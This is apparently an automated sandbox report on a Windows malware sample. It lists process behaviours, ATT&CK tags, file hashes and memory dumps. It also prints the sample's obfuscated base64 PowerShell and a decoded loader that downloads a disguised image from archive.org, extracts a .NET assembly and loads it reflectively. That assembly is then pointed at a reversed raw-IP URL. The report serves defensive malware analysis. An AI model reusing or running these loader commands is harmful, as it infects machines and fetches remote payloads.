㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟WwBT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟FI□ ⿉ ㋃ ⼏ ⫟ZQBm□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟ZQBj□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQBv□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟LgBB□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟cwBl□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YgBs□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟XQ□ ⿉ ㋃ ⼏ ⫟6□ ⿉ ㋃ ⼏ ⫟Do□ ⿉ ㋃ ⼏ ⫟T□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BC□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟B5□ ⿉ ㋃ ⼏ ⫟H□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟bwBh□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQBk□ ⿉ ㋃ ⼏ ⫟EE□ ⿉ ㋃ ⼏ ⫟cwBz□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQBi□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟eQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ec□ ⿉ ㋃ ⼏ ⫟ZQB0□ ⿉ ㋃ ⼏ ⫟FQ□ ⿉ ㋃ ⼏ ⫟eQBw□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟bgBs□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟Yg□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟Tw□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Eg□ ⿉ ㋃ ⼏ ⫟bwBt□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟Jw□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bt□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟eQBw□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟LgBH□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BN□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟VgBB□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟Jw□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟HY□ ⿉ ㋃ ⼏ ⫟bwBr□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟dQBs□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟Fs□ ⿉ ㋃ ⼏ ⫟bwBi□ ⿉ ㋃ ⼏ ⫟Go□ ⿉ ㋃ ⼏ ⫟ZQBj□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟WwBd□ ⿉ ㋃ ⼏ ⫟F0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟B4□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟LgBD□ ⿉ ㋃ ⼏ ⫟FY□ ⿉ ㋃ ⼏ ⫟RQBX□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟TwBN□ ⿉ ㋃ ⼏ ⫟E8□ ⿉ ㋃ ⼏ ⫟R□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟H□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟c□ ⿉ ㋃ ⼏ ⫟Bt□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟DE□ ⿉ ㋃ ⼏ ⫟MQ□ ⿉ ㋃ ⼏ ⫟x□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟M□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟DE□ ⿉ ㋃ ⼏ ⫟Lg□ ⿉ ㋃ ⼏ ⫟x□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟MQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟OQ□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟OgBw□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟s□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟cwBh□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQB2□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟s□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟cwBh□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQB2□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟s□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟cwBh□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQB2□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟FI□ ⿉ ㋃ ⼏ ⫟ZQBn□ ⿉ ㋃ ⼏ ⫟EE□ ⿉ ㋃ ⼏ ⫟cwBt□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('□ ⿉ ㋃ ⼏ ⫟','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3012
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CVEW/OMOD/ppmax/111.021.141.49//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2068

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    09674facbd310995bb062a471cd51c5a

    SHA1

    161111e15f166d8b49ce6d897f9a573767f74503

    SHA256

    da210d8902f84d0871742dca0141be4591ca402b70cca83756b0067292a2d60d

    SHA512

    20a07b08259bce7504c4c946252c6deba314d216b2020d49ea771843426d7dcf8c37ebcb97dd04e6dfe6d1a4dffe2ee2ee0fd888d9bbc0af4e0cb5daaeb96cd0

    Download Submit

  • memory/3012-4-0x000007FEF5C0E000-0x000007FEF5C0F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3012-5-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3012-6-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3012-7-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3012-13-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3012-14-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

    Download